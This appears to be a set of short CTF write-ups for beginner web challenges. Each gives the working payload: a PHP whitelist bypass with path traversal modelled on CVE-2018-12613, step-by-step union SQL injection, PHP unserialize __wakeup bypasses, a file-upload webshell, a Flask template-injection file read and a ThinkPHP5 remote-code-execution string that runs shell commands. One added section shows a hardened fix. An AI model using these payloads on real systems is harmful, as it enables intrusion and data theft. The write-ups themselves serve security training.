Training-WWW-Robots
Look at robots.txt and notice Disallow: /fl0g.php; open that page to get the flag.
baby_web
The initial page is index.php; capture the request with Burp and inspect the response.
warmup
Press F12 to find the link to the source, source.php.
hint.php: flag not here, and flag in ffffllllaaaagggg
<?php
highlight_file(__FILE__);
class emmm
{
    public static function checkFile(&$page)
    {
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
        // 1. page must be set and be a string
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it";
            return false;
        }
        // 2. exact match against the whitelist values
        if (in_array($page, $whitelist)) {
            return true;
        }
        // 3. cut at the first '?' and check the prefix
        $_page = mb_substr($page, 0, mb_strpos($page . '?', '?'));
        if (in_array($_page, $whitelist)) {
            return true;
        }
        // 4. URL-decode, cut at the first '?' again, check the prefix
        $_page = urldecode($page);
        $_page = mb_substr($_page, 0, mb_strpos($_page . '?', '?'));
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}
// Note: only the truncated copy $_page is validated, but the full $page is included
if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
What the checkFile function does:
- checks that page is set and is a string
- checks whether page is in the whitelist
- takes the part before the first ? and stores it in $_page
- checks whether $_page is in the whitelist
- URL-decodes page, takes the part before the first ? again, and checks whether that is in the whitelist
The check is applied to the truncated $_page, but the include uses the original $page. This is the same pattern as CVE-2018-12613, the phpMyAdmin local file inclusion vulnerability.
payload:source.php?file=hint.php%253f../../../../../../../ffffllllaaaagggg
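As an added example (not part of the challenge or of this writeup), a hardened replacement for checkFile: the input is resolved to a fixed path from the whitelist and only that resolved path is included, so the value that is checked is the value that is used. The class name emmm_fixed and function name resolveFile are my own.

```php
<?php
// Added example, not the challenge's own code: a hardened version of
// emmm::checkFile. The original validates a truncated copy ($_page, cut at
// the first '?') and then includes the full, unvalidated $_REQUEST['file'],
// so the check and the use operate on different values.
class emmm_fixed
{
    // The only files that may ever be included.
    private const WHITELIST = ["source.php", "hint.php"];

    // Returns the resolved whitelisted path, or null if the input is not allowed.
    public static function resolveFile($page): ?string
    {
        if (!is_string($page)) {
            return null;
        }
        // Strict, exact match only: no prefix handling, no URL decoding,
        // no attempt to "clean" the input. Anything else is rejected.
        $idx = array_search($page, self::WHITELIST, true);
        if ($idx === false) {
            return null;
        }
        // The returned path is built from the constant, never from the request.
        return __DIR__ . '/' . self::WHITELIST[$idx];
    }
}

$target = emmm_fixed::resolveFile($_REQUEST['file'] ?? null);
if ($target !== null) {
    include $target;
    exit;
}
echo "you can't see it";
```

With this version, source.php?file=hint.php%253f../ is rejected outright, because hint.php%3f../ is not one of the two whitelisted strings.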
NewsCenter
SQL injection with no filtering at all; either enumerate step by step or just use sqlmap.
-1' union select 1,2,3 from information_schema.tables
-1' union select 1,database(),3 from information_schema.tables#
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='news'#
-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='secret_table'#
-1' union select 1,fl4g,3 from secret_table#
NaNNaNNaNNaN-Batman
Add an .html extension to the file, change the final eval to alert, and opening it pops up the source.
Concatenating the pieces left after the regex gives be0f233ac7be98aa;
run it through eval once to get the flag.
unserialize3
<?php
class xctf
{
    public $flag = '111';
    public function __wakeup()
    {
        exit('bad requests');
    }
}
$a = new xctf();
print(serialize($a));
?>
When the property count in the serialized string is larger than the real number of properties, __wakeup() is skipped during unserialization.
Payload:?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}
upload1
This challenge has front-end validation: if the extension does not match, the upload button cannot be clicked.
You can edit the front end, or upload a jpg first and modify the intercepted request.
Connect with Caidao (菜刀) and look for the flag.
Web_python_template_injection
Python Flask template injection; the payload is given directly here.
{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}
Reference: https://www.freebuf.com/column/187845.html
Web_php_unserialize
Two points:
- O:4 -> O:+4 bypasses preg_match's [oc]:\d+ regex
- change the 1 in the serialized object to 2, larger than the real property count, to bypass __wakeup()
<?php
class Demo {
    private $file = 'index.php';
    public function __construct($file) {
        $this->file = $file;
    }
    function __destruct() {
        echo @highlight_file($this->file, true);
    }
    function __wakeup() {
        if ($this->file != 'index.php') {
            //the secret is in the fl4g.php
            $this->file = 'index.php';
        }
    }
}
$A = new Demo('fl4g.php');
$C = serialize($A);
//string(49) "O:4:"Demo":1:{s:10:"\0Demo\0file";s:8:"fl4g.php";}"
//(the private property name is wrapped in NUL bytes, which are invisible in the raw output; hence s:10)
$C = str_replace('O:4', 'O:+4',$C);//bypass preg_match
$C = str_replace(':1:', ':2:',$C);//bypass __wakeup
var_dump($C);
var_dump(base64_encode($C));
?>
Payload:?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
php_rce
ThinkPHP5 remote code execution vulnerability
Payload:?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r 'system("cat%20../../../flag");'
Reference: https://www.cnblogs.com/yuzly/p/11460285.html